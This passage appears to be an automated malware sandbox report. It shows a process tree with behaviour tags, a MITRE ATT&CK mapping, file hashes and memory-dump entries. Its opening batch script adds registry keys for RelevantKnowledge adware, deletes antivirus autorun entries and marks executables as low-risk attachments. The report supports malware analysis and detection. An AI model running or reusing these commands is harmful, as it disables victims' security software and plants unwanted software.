REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
4⤵
PID:4332

C:\Users\Admin\AppData\Local\Temp\1520.exe
C:\Users\Admin\AppData\Local\Temp\1520.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:768

C:\Users\Admin\AppData\Local\Temp\1520.exe
C:\Users\Admin\AppData\Local\Temp\1520.exe
2⤵
- Executes dropped EXE
PID:2168

C:\Users\Admin\AppData\Local\Temp\1A9F.exe
C:\Users\Admin\AppData\Local\Temp\1A9F.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4028

C:\Users\Admin\AppData\Local\Temp\1DBD.exe
C:\Users\Admin\AppData\Local\Temp\1DBD.exe
1⤵
- Executes dropped EXE
PID:1216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 732
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 744
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 844
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 880
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 872
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3160

C:\Users\Admin\AppData\Local\Temp\1F25.exe
C:\Users\Admin\AppData\Local\Temp\1F25.exe
1⤵
- Executes dropped EXE
PID:3864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 732
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 744
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 844
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 880
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 872
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:792

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3748

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2080

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3296

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3196

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2116

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2060

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1820

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1488

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3240

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Runtimebroker.exe
MD5
46fd8caf1c1ff128c4d121d58a2e9306

SHA1
f10607b0db63cf47e9fe8c01fc819e124349dc84

SHA256
f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc

SHA512
6307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
46fd8caf1c1ff128c4d121d58a2e9306

SHA1
f10607b0db63cf47e9fe8c01fc819e124349dc84

SHA256
f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc

SHA512
6307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
c558fdaa3884f969f1ec904ae7bbd991

SHA1
b4f85d04f6bf061a17f52c264c065b786cfd33ff

SHA256
3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e

SHA512
6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
89f684ecf3d2ed9901b573992a5145c6

SHA1
d43fbd341f4e25d0b2b2a63811aba43090af3dd8

SHA256
856be63c448e9c2283cc4e3efe469d057db1408f1c729d09d6c421d834ce08fe

SHA512
a16c1be1504869cee9e0be6093e7e0731cd27ee35514b9ce5d2a3fa77360db6f3245d0e9c29df36db4b8e118378af46e12c9e887e3d1fbf66b940cd01db591d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
27872b8b0dc195f9d65a5c1fea5e2395

SHA1
b1fed06a9d9804016dd94e3ab7cc721ca5e50f56

SHA256
d0a8f7f3cca87ef0104f833db9b298e20b53b3c6fe949f23070d9daf24c0b792

SHA512
497b8492d50a8387467dd82e7d24a03d48e745db9650cfe2bbf472bfb13dc14618206b44fa8e3c1d1c5f6cb6fde718461077c23222ccb16a6da4fd0d6532ab7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1389.exe
MD5
46fd8caf1c1ff128c4d121d58a2e9306

SHA1
f10607b0db63cf47e9fe8c01fc819e124349dc84

SHA256
f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc

SHA512
6307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540

Download Submit
C:\Users\Admin\AppData\Local\Temp\1389.exe
MD5
46fd8caf1c1ff128c4d121d58a2e9306

SHA1
f10607b0db63cf47e9fe8c01fc819e124349dc84

SHA256
f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc

SHA512
6307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540

Download Submit
C:\Users\Admin\AppData\Local\Temp\1520.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\1520.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\1520.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\1A9F.exe
MD5
68279fe4e69442ca2124d0758006a807

SHA1
7436d34654cee80938331ca13d90d7664e43ae94

SHA256
9cafdd248a2ff56d3eecf414762b5d98b2d4583974ed66412b276177de3d674a

SHA512
7bde7ae6d10cd2aa5deb854ad943e92db6b9ed27360337fd87f7646f6f4a356f94d6430f7ec2f0b352ec401d43dbd4e11cfbdb93c81058481b8389f521d2811d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1A9F.exe
MD5
68279fe4e69442ca2124d0758006a807

SHA1
7436d34654cee80938331ca13d90d7664e43ae94

SHA256
9cafdd248a2ff56d3eecf414762b5d98b2d4583974ed66412b276177de3d674a

SHA512
7bde7ae6d10cd2aa5deb854ad943e92db6b9ed27360337fd87f7646f6f4a356f94d6430f7ec2f0b352ec401d43dbd4e11cfbdb93c81058481b8389f521d2811d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1DBD.exe
MD5
4fb208ec7d17d1ba04dd724693231c5e

SHA1
d2861fd7a1463d5bbbf6154d7c82d4dbff6112d5

SHA256
6dfc2d77895bc8653a3a5ef24b97484ace1f716231abd88045e9e08fea2bd449

SHA512
172aa75c8d4737e91d611af37bfeaa2ad4063f7a9d630215161db32a384d71d8852bbf7114369d8a886ad7eb966b20661e40db1599733e23da393bcfd04692a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1DBD.exe
MD5
4fb208ec7d17d1ba04dd724693231c5e

SHA1
d2861fd7a1463d5bbbf6154d7c82d4dbff6112d5

SHA256
6dfc2d77895bc8653a3a5ef24b97484ace1f716231abd88045e9e08fea2bd449

SHA512
172aa75c8d4737e91d611af37bfeaa2ad4063f7a9d630215161db32a384d71d8852bbf7114369d8a886ad7eb966b20661e40db1599733e23da393bcfd04692a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1F25.exe
MD5
a14a03079bb9c9fcf9bc1877cd82b9e3

SHA1
e078ad048beeb0f0b9dc2703073a345f7c04f5f7

SHA256
ad85ec8bf87669cfc6f874e6fc4def4349ac8dabfdde8976cd90298ae24b6ce9

SHA512
9a75763ecf168e6c25980e0c37e0bc1a91cdf41dd9f256d09f9c56b186d07dd556513b343930d704776387af8723dc5137df445c7de0e8705a6e7b0268feaee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\1F25.exe
MD5
a14a03079bb9c9fcf9bc1877cd82b9e3

SHA1
e078ad048beeb0f0b9dc2703073a345f7c04f5f7

SHA256
ad85ec8bf87669cfc6f874e6fc4def4349ac8dabfdde8976cd90298ae24b6ce9

SHA512
9a75763ecf168e6c25980e0c37e0bc1a91cdf41dd9f256d09f9c56b186d07dd556513b343930d704776387af8723dc5137df445c7de0e8705a6e7b0268feaee1

Download Submit
memory/632-114-0x0000000002D60000-0x0000000002EAA000-memory.dmp

Filesize
1.3MB

Download
memory/684-162-0x0000000000000000-mapping.dmp

Download
memory/684-172-0x0000000000400000-0x0000000002C84000-memory.dmp

Filesize
40.5MB

Download
memory/684-170-0x0000000002C90000-0x0000000002D3E000-memory.dmp

Filesize
696KB

Download
memory/768-121-0x0000000000000000-mapping.dmp

Download
memory/768-212-0x0000000005180000-0x00000000051A1000-memory.dmp

Filesize
132KB

Download
memory/768-134-0x0000000004FA0000-0x0000000004FA1000-memory.dmp

Filesize
4KB

Download
memory/768-127-0x0000000005400000-0x0000000005401000-memory.dmp

Filesize
4KB

Download
memory/768-150-0x0000000004F40000-0x0000000004F41000-memory.dmp

Filesize
4KB

Download
memory/768-125-0x0000000000590000-0x0000000000591000-memory.dmp

Filesize
4KB

Download
memory/768-146-0x0000000002B60000-0x0000000002B61000-memory.dmp

Filesize
4KB

Download
memory/1216-154-0x0000000000400000-0x0000000002CB1000-memory.dmp

Filesize
40.7MB

Download
memory/1216-147-0x0000000004970000-0x0000000004A03000-memory.dmp

Filesize
588KB

Download
memory/1216-132-0x0000000000000000-mapping.dmp

Download
memory/1488-183-0x00000000008D0000-0x00000000008D9000-memory.dmp

Filesize
36KB

Download
memory/1488-181-0x0000000000000000-mapping.dmp

Download
memory/1488-182-0x00000000008E0000-0x00000000008E5000-memory.dmp

Filesize
20KB

Download
memory/1820-179-0x0000000000140000-0x0000000000144000-memory.dmp

Filesize
16KB

Download
memory/1820-177-0x0000000000000000-mapping.dmp

Download
memory/1820-180-0x0000000000130000-0x0000000000139000-memory.dmp

Filesize
36KB

Download
memory/2044-118-0x0000000000000000-mapping.dmp

Download
memory/2044-131-0x0000000000400000-0x0000000002C84000-memory.dmp

Filesize
40.5MB

Download
memory/2044-124-0x0000000002D10000-0x0000000002E5A000-memory.dmp

Filesize
1.3MB

Download
memory/2060-174-0x0000000000000000-mapping.dmp

Download
memory/2060-178-0x00000000003D0000-0x00000000003DC000-memory.dmp

Filesize
48KB

Download
memory/2060-176-0x00000000003E0000-0x00000000003E6000-memory.dmp

Filesize
24KB

Download
memory/2080-157-0x0000000000AF0000-0x0000000000AFC000-memory.dmp

Filesize
48KB

Download
memory/2080-156-0x0000000000B00000-0x0000000000B07000-memory.dmp

Filesize
28KB

Download
memory/2080-152-0x0000000000000000-mapping.dmp

Download
memory/2116-175-0x0000000000C70000-0x0000000000C79000-memory.dmp

Filesize
36KB

Download
memory/2116-173-0x0000000000C80000-0x0000000000C85000-memory.dmp

Filesize
20KB

Download
memory/2116-171-0x0000000000000000-mapping.dmp

Download
memory/2168-222-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/2168-216-0x000000000044003F-mapping.dmp

Download
memory/2168-215-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/2428-117-0x0000000000470000-0x0000000000486000-memory.dmp

Filesize
88KB

Download
memory/3188-116-0x0000000000402E1A-mapping.dmp

Download
memory/3188-115-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3196-169-0x0000000001010000-0x000000000101F000-memory.dmp

Filesize
60KB

Download
memory/3196-168-0x0000000001020000-0x0000000001029000-memory.dmp

Filesize
36KB

Download
memory/3196-167-0x0000000000000000-mapping.dmp

Download
memory/3240-186-0x00000000004E0000-0x00000000004E9000-memory.dmp

Filesize
36KB

Download
memory/3240-185-0x00000000004F0000-0x00000000004F5000-memory.dmp

Filesize
20KB

Download
memory/3240-184-0x0000000000000000-mapping.dmp

Download
memory/3296-160-0x0000000000000000-mapping.dmp

Download
memory/3296-166-0x0000000000480000-0x000000000048B000-memory.dmp

Filesize
44KB

Download
memory/3296-165-0x0000000000490000-0x0000000000497000-memory.dmp

Filesize
28KB

Download
memory/3488-201-0x0000000007C90000-0x0000000007C91000-memory.dmp

Filesize
4KB

Download
memory/3488-198-0x0000000007E10000-0x0000000007E11000-memory.dmp

Filesize
4KB

Download
memory/3488-213-0x0000000009550000-0x0000000009551000-memory.dmp

Filesize
4KB

Download
memory/3488-237-0x0000000006F23000-0x0000000006F24000-memory.dmp

Filesize
4KB

Download
memory/3488-203-0x00000000086B0000-0x00000000086B1000-memory.dmp

Filesize
4KB

Download
memory/3488-199-0x0000000007E80000-0x0000000007E81000-memory.dmp

Filesize
4KB

Download
memory/3488-197-0x0000000007DA0000-0x0000000007DA1000-memory.dmp

Filesize
4KB

Download
memory/3488-187-0x0000000000000000-mapping.dmp

Download
memory/3488-190-0x0000000004A00000-0x0000000004A01000-memory.dmp

Filesize
4KB

Download
memory/3488-191-0x0000000007560000-0x0000000007561000-memory.dmp

Filesize
4KB

Download
memory/3488-192-0x0000000006F20000-0x0000000006F21000-memory.dmp

Filesize
4KB

Download
memory/3488-193-0x0000000006F22000-0x0000000006F23000-memory.dmp

Filesize
4KB

Download
memory/3488-217-0x0000000009270000-0x0000000009271000-memory.dmp

Filesize
4KB

Download
memory/3488-214-0x00000000087B0000-0x00000000087B1000-memory.dmp

Filesize
4KB

Download
memory/3488-196-0x0000000007CC0000-0x0000000007CC1000-memory.dmp

Filesize
4KB

Download
memory/3748-143-0x0000000000000000-mapping.dmp

Download
memory/3748-148-0x00000000008D0000-0x0000000000944000-memory.dmp

Filesize
464KB

Download
memory/3748-149-0x0000000000860000-0x00000000008CB000-memory.dmp

Filesize
428KB

Download
memory/3864-136-0x0000000000000000-mapping.dmp

Download
memory/3864-155-0x0000000002D60000-0x0000000002EAA000-memory.dmp

Filesize
1.3MB

Download
memory/3864-159-0x0000000000400000-0x0000000002CB0000-memory.dmp

Filesize
40.7MB

Download
memory/4028-194-0x0000000006D00000-0x0000000006D01000-memory.dmp

Filesize
4KB

Download
memory/4028-158-0x0000000005740000-0x0000000005741000-memory.dmp

Filesize
4KB

Download
memory/4028-195-0x0000000007400000-0x0000000007401000-memory.dmp

Filesize
4KB

Download
memory/4028-145-0x0000000005790000-0x0000000005791000-memory.dmp

Filesize
4KB

Download
memory/4028-161-0x00000000059D0000-0x00000000059D1000-memory.dmp

Filesize
4KB

Download
memory/4028-144-0x0000000005D60000-0x0000000005D61000-memory.dmp

Filesize
4KB

Download
memory/4028-151-0x00000000057F0000-0x00000000057F1000-memory.dmp

Filesize
4KB

Download
memory/4028-142-0x00000000779F0000-0x0000000077B7E000-memory.dmp

Filesize
1.6MB

Download
memory/4028-128-0x0000000000000000-mapping.dmp

Download
memory/4028-140-0x00000000008A0000-0x00000000008A1000-memory.dmp

Filesize
4KB

Download
memory/4028-207-0x00000000073B0000-0x00000000073B1000-memory.dmp

Filesize
4KB

Download
memory/4028-153-0x0000000005830000-0x0000000005831000-memory.dmp

Filesize
4KB

Download
memory/4136-238-0x0000000000E90000-0x0000000000E91000-memory.dmp

Filesize
4KB

Download
memory/4136-239-0x0000000000E92000-0x0000000000E93000-memory.dmp

Filesize
4KB

Download
memory/4136-245-0x00000000092B0000-0x00000000092B1000-memory.dmp

Filesize
4KB

Download
memory/4136-247-0x0000000000E93000-0x0000000000E94000-memory.dmp

Filesize
4KB

Download
memory/4136-248-0x0000000008DE0000-0x0000000008F3B000-memory.dmp

Filesize
1.4MB

Download
memory/4136-224-0x0000000000000000-mapping.dmp

Download
memory/4136-233-0x0000000007520000-0x0000000007521000-memory.dmp

Filesize
4KB

Download
memory/4332-503-0x0000000000000000-mapping.dmp

Download
memory/4364-258-0x0000000006A10000-0x0000000006A11000-memory.dmp

Filesize
4KB

Download
memory/4364-270-0x0000000008BE0000-0x0000000008C13000-memory.dmp

Filesize
204KB

Download
memory/4364-284-0x000000007E6D0000-0x000000007E6D1000-memory.dmp

Filesize
4KB

Download
memory/4364-286-0x0000000006A13000-0x0000000006A14000-memory.dmp

Filesize
4KB

Download
memory/4364-259-0x0000000006A12000-0x0000000006A13000-memory.dmp

Filesize
4KB

Download
memory/4364-249-0x0000000000000000-mapping.dmp

Download